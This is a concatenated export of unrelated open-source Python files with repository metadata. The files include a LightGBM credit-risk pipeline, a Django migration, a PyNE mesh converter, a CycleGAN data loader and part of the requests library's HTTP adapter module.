    ins['PAYMENT_DIFF'] = ins['AMT_INSTALMENT'] - ins['AMT_PAYMENT']
    # Days past due / days before due, clipped at zero.
    ins['DPD'] = ins['DAYS_ENTRY_PAYMENT'] - ins['DAYS_INSTALMENT']
    ins['DBD'] = ins['DAYS_INSTALMENT'] - ins['DAYS_ENTRY_PAYMENT']
    ins['DPD'] = ins['DPD'].apply(lambda v: v if v > 0 else 0)
    ins['DBD'] = ins['DBD'].apply(lambda v: v if v > 0 else 0)
    # Numeric aggregations, plus the mean of every one-hot category column.
    aggregations = {
        'NUM_INSTALMENT_VERSION': ['nunique'],
        'DPD': ['max', 'mean', 'sum'],
        'DBD': ['max', 'mean', 'sum'],
        'PAYMENT_PERC': ['max', 'mean', 'sum', 'var'],
        'PAYMENT_DIFF': ['max', 'mean', 'sum', 'var'],
        'AMT_INSTALMENT': ['max', 'mean', 'sum'],
        'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],
        'DAYS_ENTRY_PAYMENT': ['max', 'mean', 'sum'],
    }
    aggregations.update({cat: ['mean'] for cat in cat_cols})
    agg = ins.groupby('SK_ID_CURR').agg(aggregations)
    # Flatten the (column, stat) MultiIndex to INSTAL_COLUMN_STAT names.
    agg.columns = pd.Index(['INSTAL_' + col + "_" + stat.upper() for col, stat in agg.columns.tolist()])
    # Number of installment records per client.
    agg['INSTAL_COUNT'] = ins.groupby('SK_ID_CURR').size()
    del ins
    gc.collect()
    return agg
# Preprocess credit_card_balance.csv
def credit_card_balance(num_rows = None, nan_as_category = True):
    """Aggregate credit_card_balance.csv per client (SK_ID_CURR)."""
    cc = pd.read_csv('data/credit_card_balance.csv', nrows= num_rows)
    cc, _ = one_hot_encoder(cc, nan_as_category= True)
    # SK_ID_PREV is an identifier, not a feature.
    cc.drop(['SK_ID_PREV'], axis= 1, inplace = True)
    # Apply the same five statistics to every remaining column.
    agg = cc.groupby('SK_ID_CURR').agg(['min', 'max', 'mean', 'sum', 'var'])
    agg.columns = pd.Index(['CC_' + col + "_" + stat.upper() for col, stat in agg.columns.tolist()])
    # Number of credit-card records per client.
    agg['CC_COUNT'] = cc.groupby('SK_ID_CURR').size()
    del cc
    gc.collect()
    return agg
# LightGBM GBDT with KFold or Stratified KFold
# Parameters from Tilii kernel: https://www.kaggle.com/tilii7/olivier-lightgbm-parameters-by-bayesian-opt/code
def kfold_lightgbm(df, num_folds, stratified = False, debug= False):
    """Train LightGBM with K-fold CV; return the per-fold feature importances.

    Rows with a non-null TARGET form the training set, null-TARGET rows the
    test set. Out-of-fold AUC is printed per fold; unless *debug* is True,
    the fold-averaged test predictions are written to the CSV named by the
    module-level global ``submission_file_name``.
    """
    # Divide in training/validation and test data
    train_df = df[df['TARGET'].notnull()]
    test_df = df[df['TARGET'].isnull()]
    print("Starting LightGBM. Train shape: {}, test shape: {}".format(train_df.shape, test_df.shape))
    del df
    gc.collect()
    # Cross validation model
    if stratified:
        folds = StratifiedKFold(n_splits= num_folds, shuffle=True, random_state=1001)
    else:
        folds = KFold(n_splits= num_folds, shuffle=True, random_state=1001)
    # Create arrays and dataframes to store results
    oof_preds = np.zeros(train_df.shape[0])
    sub_preds = np.zeros(test_df.shape[0])
    feature_importance_df = pd.DataFrame()
    # Identifier / index columns are excluded from the feature set.
    feats = [f for f in train_df.columns if f not in ['TARGET','SK_ID_CURR','SK_ID_BUREAU','SK_ID_PREV','index']]
    for n_fold, (train_idx, valid_idx) in enumerate(folds.split(train_df[feats], train_df['TARGET'])):
        train_x, train_y = train_df[feats].iloc[train_idx], train_df['TARGET'].iloc[train_idx]
        valid_x, valid_y = train_df[feats].iloc[valid_idx], train_df['TARGET'].iloc[valid_idx]
        # LightGBM parameters found by Bayesian optimization
        clf = LGBMClassifier(
            nthread=4,
            n_estimators=10000,
            learning_rate=0.02,
            num_leaves=34,
            colsample_bytree=0.9497036,
            subsample=0.8715623,
            max_depth=8,
            reg_alpha=0.041545473,
            reg_lambda=0.0735294,
            min_split_gain=0.0222415,
            min_child_weight=39.3259775,
            silent=-1,
            verbose=-1, )
        clf.fit(train_x, train_y, eval_set=[(train_x, train_y), (valid_x, valid_y)],
            eval_metric= 'auc', verbose= 100, early_stopping_rounds= 200)
        # Out-of-fold predictions at the best iteration; test predictions
        # are averaged across folds.
        oof_preds[valid_idx] = clf.predict_proba(valid_x, num_iteration=clf.best_iteration_)[:, 1]
        sub_preds += clf.predict_proba(test_df[feats], num_iteration=clf.best_iteration_)[:, 1] / folds.n_splits
        fold_importance_df = pd.DataFrame()
        fold_importance_df["feature"] = feats
        fold_importance_df["importance"] = clf.feature_importances_
        fold_importance_df["fold"] = n_fold + 1
        feature_importance_df = pd.concat([feature_importance_df, fold_importance_df], axis=0)
        print('Fold %2d AUC : %.6f' % (n_fold + 1, roc_auc_score(valid_y, oof_preds[valid_idx])))
        del clf, train_x, train_y, valid_x, valid_y
        gc.collect()
    print('Full AUC score %.6f' % roc_auc_score(train_df['TARGET'], oof_preds))
    # Write submission file and plot feature importance
    if not debug:
        test_df['TARGET'] = sub_preds
        test_df[['SK_ID_CURR', 'TARGET']].to_csv(submission_file_name, index= False)
    display_importances(feature_importance_df)
    return feature_importance_df
# Display/plot feature importance
def display_importances(feature_importance_df_):
    """Save a bar plot of the 40 features with the highest mean importance across folds."""
    mean_importance = feature_importance_df_[["feature", "importance"]].groupby("feature").mean()
    top_features = mean_importance.sort_values(by="importance", ascending=False)[:40].index
    plot_data = feature_importance_df_.loc[feature_importance_df_.feature.isin(top_features)]
    plt.figure(figsize=(8, 10))
    sns.barplot(x="importance", y="feature",
                data=plot_data.sort_values(by="importance", ascending=False))
    plt.title('LightGBM Features (avg over folds)')
    plt.tight_layout()
    plt.savefig('lgbm_importances01.png')
def main(debug = False):
    """Run the full pipeline: join every aggregated table onto the
    application frame, then train LightGBM with K-fold CV.

    With debug=True only the first 10000 rows of each CSV are read.
    """
    num_rows = 10000 if debug else None
    df = application_train_test(num_rows)
    # Each auxiliary table is built, reported, joined on SK_ID_CURR and freed.
    steps = (
        ("Process bureau and bureau_balance", bureau_and_balance, "Bureau df shape:"),
        ("Process previous_applications", previous_applications, "Previous applications df shape:"),
        ("Process POS-CASH balance", pos_cash, "Pos-cash balance df shape:"),
        ("Process installments payments", installments_payments, "Installments payments df shape:"),
        ("Process credit card balance", credit_card_balance, "Credit card balance df shape:"),
    )
    for title, build, label in steps:
        with timer(title):
            table = build(num_rows)
            print(label, table.shape)
            df = df.join(table, how='left', on='SK_ID_CURR')
            del table
            gc.collect()
    with timer("Run LightGBM with kfold"):
        feat_importance = kfold_lightgbm(df, num_folds= 5, stratified= False, debug= debug)
if __name__ == "__main__":
    # Read by kfold_lightgbm as a module-level global.
    submission_file_name = "submission_kernel02.csv"
    with timer("Full model run"):
        main()
|
[
"aukslius@gmail.com"
] |
aukslius@gmail.com
|
e7a3ca9fa15a77897aa6fde5e7b69ee9bb2f853d
|
ac350894488b34318c11a65d35a0f8fdf69b7d50
|
/products/migrations/0001_initial.py
|
545343aa9abd1f1393c114e71c6c8e1aed73463f
|
[] |
no_license
|
phrac/onemgin
|
508f052304ddbc03f45e994ebe33769ae30d9336
|
7a029dbca1bd2725ceabc0741c7cfb47290aadb7
|
refs/heads/master
| 2021-01-16T19:31:10.929508
| 2015-09-08T23:53:43
| 2015-09-08T23:53:43
| 12,391,387
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,083
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Initial migration: creates the Product, BarcodeType and Barcode tables."""
    # First migration for this app: no dependencies.
    dependencies = [
    ]
    operations = [
        # A rendered barcode image; FKs to Product/BarcodeType added below.
        migrations.CreateModel(
            name='Barcode',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('image', models.FileField(null=True, upload_to=b'barcodes/ean13/')),
            ],
        ),
        # Lookup table of barcode kinds (EAN, UPC, ...).
        migrations.CreateModel(
            name='BarcodeType',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=32)),
            ],
        ),
        # Core product record, keyed by several industry identifiers.
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('onemg', models.CharField(unique=True, max_length=13)),
                ('ean', models.CharField(unique=True, max_length=13)),
                ('upc', models.CharField(unique=True, max_length=12)),
                ('jan', models.CharField(max_length=13, null=True)),
                ('gtin', models.CharField(max_length=14, null=True)),
                ('nsn', models.CharField(max_length=14, null=True)),
                ('isbn10', models.CharField(max_length=10, null=True)),
                ('isbn13', models.CharField(max_length=13, null=True)),
                ('asin', models.CharField(max_length=10, null=True)),
                ('brand', models.CharField(max_length=128, null=True)),
                ('manufacturer', models.CharField(max_length=128, null=True)),
                ('mpn', models.CharField(max_length=64, null=True)),
                ('part_number', models.CharField(max_length=64, null=True)),
                ('sku', models.CharField(max_length=64, null=True)),
                ('model_number', models.CharField(max_length=64, null=True)),
                ('length', models.FloatField(null=True)),
                ('width', models.FloatField(null=True)),
                ('height', models.FloatField(null=True)),
                ('weight', models.FloatField(null=True)),
                ('description', models.CharField(max_length=512, null=True)),
                ('image_url', models.CharField(max_length=512, null=True)),
                ('amazon_url', models.URLField(null=True)),
                ('created', models.DateTimeField(auto_now_add=True, null=True)),
            ],
        ),
        # Foreign keys are added after both referenced tables exist.
        migrations.AddField(
            model_name='barcode',
            name='product',
            field=models.ForeignKey(to='products.Product'),
        ),
        migrations.AddField(
            model_name='barcode',
            name='type',
            field=models.ForeignKey(to='products.BarcodeType'),
        ),
        # Each product can have at most one barcode per type.
        migrations.AlterUniqueTogether(
            name='barcode',
            unique_together=set([('product', 'type')]),
        ),
    ]
|
[
"derek@disflux.com"
] |
derek@disflux.com
|
8e1342c5a5fb325ae9a8dd315f48ea850dd6e3fb
|
9f9fa056d9f9a9a1671fd76009aaabeef9ce58d6
|
/output/wwinp_plot.py
|
a64392e3395afc046326b7dcf81e4ff7429f873d
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
py1sl/pyne_based_tools
|
8a6f9172125bcf24698d2c3d0a3ef5b493eaea1c
|
92bd8865b9e9de78d24a2e635e0f2e826bad5e61
|
refs/heads/master
| 2021-01-19T03:13:11.600946
| 2017-09-12T09:49:35
| 2017-09-12T09:49:35
| 55,595,092
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 503
|
py
|
from pyne import mcnp
from itaps import iBase, iMesh
import h5py
import sys
from subprocess import call
def convert_wwinp(argv):
    """Convert an MCNP wwinp (weight-window) file to VTK via an intermediate .h5m mesh.

    argv[0] is the input wwinp path; argv[1] is the output basename (no
    extension). Produces <out>.vtk and removes the temporary <out>.h5m.
    """
    # Fail with a clear usage message instead of an IndexError.
    if len(argv) < 2:
        raise SystemExit("usage: wwinp_plot.py <wwinp_in> <output_basename>")
    in_path = argv[0]
    out_path = argv[1]
    wwinp_mesh = mcnp.Wwinp()
    wwinp_mesh.read_wwinp(in_path)
    wwinp_mesh.mesh.save(out_path + ".h5m")
    # expand_tags.py (PyNE helper script) converts the tagged h5m mesh to vtk.
    call(["expand_tags.py", out_path + ".h5m", "-o", out_path + ".vtk"])
    # Best-effort cleanup of the intermediate mesh file; the return code is
    # deliberately ignored.
    call(["rm", out_path + ".h5m"])
if __name__ == "__main__":
    # Pass through the CLI arguments, dropping the script name.
    convert_wwinp(sys.argv[1:])
|
[
"steven.lilley@stfc.ac.uk"
] |
steven.lilley@stfc.ac.uk
|
ddc87bfca79fabe3d914696f58497118d2d0d193
|
5ec06dab1409d790496ce082dacb321392b32fe9
|
/clients/python/generated/test/test_com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info.py
|
d51b3347b77c7b18680b18281fcd2bb012c5ead3
|
[
"Apache-2.0"
] |
permissive
|
shinesolutions/swagger-aem-osgi
|
e9d2385f44bee70e5bbdc0d577e99a9f2525266f
|
c2f6e076971d2592c1cbd3f70695c679e807396b
|
refs/heads/master
| 2022-10-29T13:07:40.422092
| 2021-04-09T07:46:03
| 2021-04-09T07:46:03
| 190,217,155
| 3
| 3
|
Apache-2.0
| 2022-10-05T03:26:20
| 2019-06-04T14:23:28
| null |
UTF-8
|
Python
| false
| false
| 1,359
|
py
|
# coding: utf-8
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import swaggeraemosgi
from swaggeraemosgi.models.com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info import ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo # noqa: E501
from swaggeraemosgi.rest import ApiException
class TestComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo(unittest.TestCase):
    """ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo unit test stubs"""
    # Generated stub: no fixtures are needed yet.
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def testComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo(self):
        """Test ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo"""
        # FIXME: construct object with mandatory attributes with example values
        # model = swaggeraemosgi.models.com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info.ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo() # noqa: E501
        pass
if __name__ == '__main__':
    # Discover and run the test stubs above.
    unittest.main()
|
[
"michael.bloch@shinesolutions.com"
] |
michael.bloch@shinesolutions.com
|
72dc217f031f0e0fe7fb784bc8ac8024f1dc926e
|
340d83cbefd7a9c88b18ff25f6f5dd90e1131ad6
|
/setup.py
|
54baf8251ca1cb7f55ed33f6ffb2465951c6bfb5
|
[
"MIT"
] |
permissive
|
PTC-CMC/calculator
|
50304326acfd501a6503d59ad81cc3502b21d934
|
e89ab40336ebe57e3a2c272281f9160a212e7055
|
refs/heads/master
| 2022-10-03T19:21:48.502774
| 2020-06-04T19:54:30
| 2020-06-04T19:54:30
| 269,222,035
| 0
| 5
|
MIT
| 2020-06-04T19:54:31
| 2020-06-04T00:17:00
|
Python
|
UTF-8
|
Python
| false
| false
| 232
|
py
|
from setuptools import setup
# Originally an idea and implementation by Matt Thompson
# https://github.com/mattwthompson/calculator
setup(
name='Calculator',
version='0.0',
packages=['calculator',],
license='MIT',
)
|
[
"justin.b.gilmer@vanderbilt.edu"
] |
justin.b.gilmer@vanderbilt.edu
|
e50d54beea6551c36fdd72ef808ecc04b47ee774
|
1445a2e276630a3ba30522a7efd8bd35387ac525
|
/sheets/getPointData.py
|
e5065f4d3382872d7b3f212385503e5bf9432af4
|
[] |
no_license
|
Wu-jiaming/score
|
7cbc071fc28b2c909c477abe319277f0ccd4e7f4
|
e8b679ad8e88164de2070e1d08e92ab24f440aa8
|
refs/heads/master
| 2020-03-22T15:57:10.492895
| 2018-09-02T15:00:48
| 2018-09-02T15:00:48
| 140,291,736
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,433
|
py
|
"""
获取结点信息,保存为【(),()】格式,
对数据进行排序
格式转换为[{key:value}]格式,目的是分组
分组之后,自个组的key,value保存成[[key],[key]],[[value],[value]]
"""
import re
from operator import itemgetter
from itertools import groupby
"""
获取相关节点
"""
def get_point(sourcePath):
print("sourcepath:", sourcePath)
fR = open(sourcePath, 'r+' , encoding='utf-8')
lines = fR.readlines()
pointList = []
pointLists = []
for line in lines:
pointPattern = re.compile(r'.*?Point\.(.*?)s.*?opt1:"(.*?)".*?opt2:"(.*?)"')
pointList = re.match(pointPattern, line)
if pointList is not None:
#pointLists.append(())
score = pointList.group(1)
s1 = pointList.group(2)
s2 = pointList.group(3)
pointLists.append((float(score), float(s1), float(s2)))
#pointList.append()
#print(line)
#return line
fR.close()
print("pointList:", pointList)
return pointLists
"""
排序
如果是所个关键词比较,可以用一下方法,先比较第一关键词,相等再比较第二个
#lists.sort(key=operator.itemgetter(0,1))
lists.sort(key=lambda x:(x[0],x[1]))
"""
def listSort(lists):
#operator.itemgetter排序,0表示第一个维度,1表示第二维度
#lists.sort(key=operator.itemgetter(0))
lists.sort(key=lambda x:(x[0]))
print("lists:", lists)
return lists
#把原有的格式list[(1,2,3)]转化成dict,{'key':1,'value':(1,2,3)}
#目的是为了进行分组,分组需要key
def getLists(lists):
dLists=[]
for i,value in enumerate(lists):
d={}
flag = value[0]
d['key'] = flag
d['value'] = value
dLists.append(d)
return dLists
#把dict分组,使用了groupby的方法分组之前,得先排序sort
#迭代,分别将key和value保存到2个list(groupName,groupValue)
def groupLists(lists):
dLists = getLists(lists)
#分组之前最好先排序
dLists.sort(key = itemgetter('key'))
groupLists = groupby(dLists, itemgetter('key'))
#组名 组的值
groupName = []
groupValue = []
for key,group in groupLists:
groupName.append(key)
v = []
for value in group:
v.append(value['value'])
#print("value:", value['value'])
groupValue.append(v)
return (groupName,groupValue)
|
[
"754205661@qq.com"
] |
754205661@qq.com
|
06a103582032ffff0d67b7ec6ac252dc5b255a8d
|
91d48932143ced234aa13b35a597b809c757e928
|
/cyclegan/load_data.py
|
ca9b07ce1717e3fe5c4769447ec1845be6ef5d6b
|
[] |
no_license
|
starbucksdolcelatte/FittingroomAnywhere2
|
9b86e76b592960c1350f54ace84a2e0cc64ab7e7
|
147e04eb8f326f25bafdb917e1b1d4974798d230
|
refs/heads/master
| 2020-07-11T17:16:38.331533
| 2019-10-11T03:18:34
| 2019-10-11T03:18:34
| 204,602,862
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,698
|
py
|
import os
import numpy as np
from PIL import Image
from keras.utils import Sequence
#from skimage.io import imread
def load_data(nr_of_channels, batch_size=1, nr_A_train_imgs=None, nr_B_train_imgs=None,
nr_A_test_imgs=None, nr_B_test_imgs=None, project_dir = '', subfolder='',
generator=False, D_model=None, use_multiscale_discriminator=False, use_supervised_learning=False, REAL_LABEL=1.0):
trainA_path = os.path.join(project_dir, 'datasets', subfolder, 'trainA')
trainB_path = os.path.join(project_dir, 'datasets', subfolder, 'trainB')
testA_path = os.path.join(project_dir, 'datasets', subfolder, 'testA')
testB_path = os.path.join(project_dir, 'datasets', subfolder, 'testB')
trainA_image_names = os.listdir(trainA_path)
if nr_A_train_imgs != None:
trainA_image_names = trainA_image_names[:nr_A_train_imgs]
trainB_image_names = os.listdir(trainB_path)
if nr_B_train_imgs != None:
trainB_image_names = trainB_image_names[:nr_B_train_imgs]
testA_image_names = os.listdir(testA_path)
if nr_A_test_imgs != None:
testA_image_names = testA_image_names[:nr_A_test_imgs]
testB_image_names = os.listdir(testB_path)
if nr_B_test_imgs != None:
testB_image_names = testB_image_names[:nr_B_test_imgs]
if generator:
return data_sequence(trainA_path, trainB_path, trainA_image_names, trainB_image_names, batch_size=batch_size) # D_model, use_multiscale_discriminator, use_supervised_learning, REAL_LABEL)
else:
trainA_images = create_image_array(trainA_image_names, trainA_path, nr_of_channels)
trainB_images = create_image_array(trainB_image_names, trainB_path, nr_of_channels)
testA_images = create_image_array(testA_image_names, testA_path, nr_of_channels)
testB_images = create_image_array(testB_image_names, testB_path, nr_of_channels)
return {"trainA_images": trainA_images, "trainB_images": trainB_images,
"testA_images": testA_images, "testB_images": testB_images,
"trainA_image_names": trainA_image_names,
"trainB_image_names": trainB_image_names,
"testA_image_names": testA_image_names,
"testB_image_names": testB_image_names}
def load_one(nr_of_channels, project_dir='', subfolder=''):
input_path = os.path.join(project_dir, 'datasets', subfolder, 'segmented') # load segmented tshirt image for fake generation
input_image_name = os.listdir(input_path)[0] # read only one image
input_image = create_image_array(input_image_name, input_path, nr_of_channels)
return {"input_image": input_image, "input_image_name": input_image_name}
def create_image_array(image_list, image_path, nr_of_channels):
image_array = []
for image_name in image_list:
if image_name[-1].lower() == 'g': # to avoid e.g. thumbs.db files
if nr_of_channels == 1: # Gray scale image -> MR image
image = np.array(Image.open(os.path.join(image_path, image_name)))
image = image[:, :, np.newaxis]
else: # RGB image -> street view
image = np.array(Image.open(os.path.join(image_path, image_name)))
image = normalize_array(image)
image_array.append(image)
return np.array(image_array)
# If using 16 bit depth images, use the formula 'array = array / 32767.5 - 1' instead
def normalize_array(array):
array = array / 127.5 - 1
return array
class data_sequence(Sequence):
def __init__(self, trainA_path, trainB_path, image_list_A, image_list_B, batch_size=1): # , D_model, use_multiscale_discriminator, use_supervised_learning, REAL_LABEL):
self.batch_size = batch_size
self.train_A = []
self.train_B = []
for image_name in image_list_A:
if image_name[-1].lower() == 'g': # to avoid e.g. thumbs.db files
self.train_A.append(os.path.join(trainA_path, image_name))
for image_name in image_list_B:
if image_name[-1].lower() == 'g': # to avoid e.g. thumbs.db files
self.train_B.append(os.path.join(trainB_path, image_name))
def __len__(self):
return int(max(len(self.train_A), len(self.train_B)) / float(self.batch_size))
def __getitem__(self, idx): # , use_multiscale_discriminator, use_supervised_learning):if loop_index + batch_size >= min_nr_imgs:
if idx >= min(len(self.train_A), len(self.train_B)):
# If all images soon are used for one domain,
# randomly pick from this domain
if len(self.train_A) <= len(self.train_B):
indexes_A = np.random.randint(len(self.train_A), size=self.batch_size)
batch_A = []
for i in indexes_A:
batch_A.append(self.train_A[i])
batch_B = self.train_B[idx * self.batch_size:(idx + 1) * self.batch_size]
else:
indexes_B = np.random.randint(len(self.train_B), size=self.batch_size)
batch_B = []
for i in indexes_B:
batch_B.append(self.train_B[i])
batch_A = self.train_A[idx * self.batch_size:(idx + 1) * self.batch_size]
else:
batch_A = self.train_A[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_B = self.train_B[idx * self.batch_size:(idx + 1) * self.batch_size]
real_images_A = create_image_array(batch_A, '', 3)
real_images_B = create_image_array(batch_B, '', 3)
return real_images_A, real_images_B # input_data, target_data
if __name__ == '__main__':
load_data()
|
[
"seoyoon9535@gmail.com"
] |
seoyoon9535@gmail.com
|
a1d1ee62356d167897f0766db41dcf93a9ca6203
|
c59a02471f295f93b56f9fadd51b47ec24414014
|
/historical/myenv/lib/python2.7/site-packages/pip/_vendor/requests/adapters.py
|
b48165bb7e18aced872069dd55d5b3a7989ca46d
|
[] |
no_license
|
jgdevelopment/Chronos-Backend
|
a3abe8bfea88d1456d03b2eaf411ab31d6b83fc1
|
548af4d7c8edc81c0b860862999dc0156b2e1fa2
|
refs/heads/master
| 2021-01-01T19:51:59.551831
| 2014-10-21T11:05:57
| 2014-10-21T11:05:57
| 16,659,327
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,968
|
py
|
# -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import socket
from .models import Response
from .packages.urllib3.poolmanager import PoolManager, proxy_from_url
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.util import Timeout as TimeoutSauce
from .compat import urlparse, basestring, urldefrag, unquote
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
except_on_missing_scheme, get_auth_from_url)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import TimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3.exceptions import ProxyError as _ProxyError
from .cookies import extract_cookies_to_jar
from .exceptions import ConnectionError, Timeout, SSLError, ProxyError
from .auth import _basic_auth_str
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
class BaseAdapter(object):
"""The Base Transport Adapter"""
def __init__(self):
super(BaseAdapter, self).__init__()
def send(self):
raise NotImplementedError
def close(self):
raise NotImplementedError
class HTTPAdapter(BaseAdapter):
"""The built-in HTTP Adapter for urllib3.
Provides a general-case interface for Requests sessions to contact HTTP and
HTTPS urls by implementing the Transport Adapter interface. This class will
usually be created by the :class:`Session <Session>` class under the
covers.
:param pool_connections: The number of urllib3 connection pools to cache.
:param pool_maxsize: The maximum number of connections to save in the pool.
:param max_retries: The maximum number of retries each connection should attempt.
:param pool_block: Whether the connection pool should block for connections.
Usage::
>>> import requests
>>> s = requests.Session()
>>> a = requests.adapters.HTTPAdapter()
>>> s.mount('http://', a)
"""
__attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
'_pool_block']
def __init__(self, pool_connections=DEFAULT_POOLSIZE,
pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
pool_block=DEFAULT_POOLBLOCK):
self.max_retries = max_retries
self.config = {}
self.proxy_manager = {}
super(HTTPAdapter, self).__init__()
self._pool_connections = pool_connections
self._pool_maxsize = pool_maxsize
self._pool_block = pool_block
self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
def __getstate__(self):
return dict((attr, getattr(self, attr, None)) for attr in
self.__attrs__)
def __setstate__(self, state):
for attr, value in state.items():
setattr(self, attr, value)
self.init_poolmanager(self._pool_connections, self._pool_maxsize,
block=self._pool_block)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK):
"""Initializes a urllib3 PoolManager. This method should not be called
from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param connections: The number of urllib3 connection pools to cache.
:param maxsize: The maximum number of connections to save in the pool.
:param block: Block when no free connections are available.
"""
# save these values for pickling
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
block=block)
def cert_verify(self, conn, url, verify, cert):
"""Verify a SSL certificate. This method should not be called from user
code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param conn: The urllib3 connection object associated with the cert.
:param url: The requested URL.
:param verify: Whether we should actually verify the certificate.
:param cert: The SSL certificate to verify.
"""
if url.lower().startswith('https') and verify:
cert_loc = None
# Allow self-specified cert location.
if verify is not True:
cert_loc = verify
if not cert_loc:
cert_loc = DEFAULT_CA_BUNDLE_PATH
if not cert_loc:
raise Exception("Could not find a suitable SSL CA certificate bundle.")
conn.cert_reqs = 'CERT_REQUIRED'
conn.ca_certs = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
if cert:
if not isinstance(cert, basestring):
conn.cert_file = cert[0]
conn.key_file = cert[1]
else:
conn.cert_file = cert
def build_response(self, req, resp):
"""Builds a :class:`Response <requests.Response>` object from a urllib3
response. This should not be called from user code, and is only exposed
for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
:param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
:param resp: The urllib3 response object.
"""
response = Response()
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
response.raw = resp
response.reason = response.raw.reason
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
# Add new cookies from the server.
extract_cookies_to_jar(response.cookies, req, resp)
# Give the Response some context.
response.request = req
response.connection = self
return response
def get_connection(self, url, proxies=None):
"""Returns a urllib3 connection for the given URL. This should not be
called from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param url: The URL to connect to.
:param proxies: (optional) A Requests-style dictionary of proxies used on this request.
"""
proxies = proxies or {}
proxy = proxies.get(urlparse(url.lower()).scheme)
if proxy:
except_on_missing_scheme(proxy)
proxy_headers = self.proxy_headers(proxy)
if not proxy in self.proxy_manager:
self.proxy_manager[proxy] = proxy_from_url(
proxy,
proxy_headers=proxy_headers)
conn = self.proxy_manager[proxy].connection_from_url(url)
else:
conn = self.poolmanager.connection_from_url(url.lower())
return conn
def close(self):
"""Disposes of any internal state.
Currently, this just closes the PoolManager, which closes pooled
connections.
"""
self.poolmanager.clear()
def request_url(self, request, proxies):
"""Obtain the url to use when making the final request.
If the message is being sent through a HTTP proxy, the full URL has to
be used. Otherwise, we should only use the path portion of the URL.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param proxies: A dictionary of schemes to proxy URLs.
"""
proxies = proxies or {}
scheme = urlparse(request.url).scheme.lower()
proxy = proxies.get(scheme)
if proxy and scheme != 'https':
url, _ = urldefrag(request.url)
else:
url = request.path_url
return url
def add_headers(self, request, **kwargs):
"""Add any headers needed by the connection. As of v2.0 this does
nothing by default, but is left for overriding by users that subclass
the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
:param kwargs: The keyword arguments from the call to send().
"""
pass
def proxy_headers(self, proxy):
"""Returns a dictionary of the headers to add to any request sent
through a proxy. This works with urllib3 magic to ensure that they are
correctly sent to the proxy, rather than in a tunnelled request if
CONNECT is being used.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxies: The url of the proxy being used for this request.
:param kwargs: Optional additional keyword arguments.
"""
headers = {}
username, password = get_auth_from_url(proxy)
if username and password:
# Proxy auth usernames and passwords will be urlencoded, we need
